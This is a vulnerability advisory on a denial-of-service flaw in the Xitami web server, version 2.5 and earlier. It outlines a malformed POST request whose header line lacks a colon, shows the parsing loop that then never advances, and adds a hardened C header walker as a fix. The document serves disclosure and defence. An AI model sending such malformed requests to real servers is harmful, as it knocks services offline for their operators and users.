Xitami web server has been found to contain a vulnerability that allows remote attackers to cause a denial of service against the product by sending the server a malformed header.
Credit:
The information has been provided by Tri Huynh.
Vulnerable systems:
* Xitami version 2.5 and prior
Xitami has a logic error in the way it handles POST requests. A request like the following causes the server to stop responding to any other requests, although it still listens on port 80:
POST /forum/index.php HTTP/1.1
Referer: Sentryunion
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Content-Length: 10
(Long string here)
0x0D 0x0A
(Another long string here)
Vulnerable code:
The code that parses the HTTP headers has flawed loop logic:
while (header && *header && *header != '\r')
{
    header_name = header;
    /* header is advanced only when a ':' is found */
    if ((header_value = strchr(header_name, ':')) != NULL)
    { ... header++; }
}
If a header line in the HTTP request does not contain a ":" character, header is never advanced, so the while loop runs until the process is manually terminated.
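A header loop that cannot stall on a line without ":", shown as an added example; it is not Xitami's code or the vendor's fix. The function name count_headers and the policy of rejecting malformed lines are assumptions made here.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical hardened header walker (not Xitami code).
 * Walks CRLF-terminated header lines up to the blank line that ends the
 * header block. Returns the number of well-formed "Name: value" lines,
 * or -1 if a line lacks ':' or the block is not properly terminated. */
int count_headers(const char *header)
{
    int count = 0;

    while (header && *header && *header != '\r') {
        const char *eol = strstr(header, "\r\n");
        if (eol == NULL)
            return -1;              /* unterminated line: reject */

        /* Search for ':' only inside the current line. */
        const char *colon = memchr(header, ':', (size_t)(eol - header));
        if (colon == NULL || colon == header)
            return -1;              /* no separator or empty name: reject */

        count++;
        header = eol + 2;           /* always advance past this line */
    }
    /* The block must end with the empty line "\r\n". */
    if (header == NULL || strncmp(header, "\r\n", 2) != 0)
        return -1;
    return count;
}

int main(void)
{
    /* Constructed samples: the second line of 'bad' has no ':' separator. */
    const char *bad = "Content-Length: 10\r\nAAAAAAAAAAAAAAAA\r\n\r\n";
    const char *ok  = "Referer: Sentryunion\r\nContent-Length: 10\r\n\r\n";
    printf("bad=%d ok=%d\n", count_headers(bad), count_headers(ok));
    return 0;
}
```

Every path through the loop either returns or moves the pointer forward, so a request can no longer pin the worker in the parser.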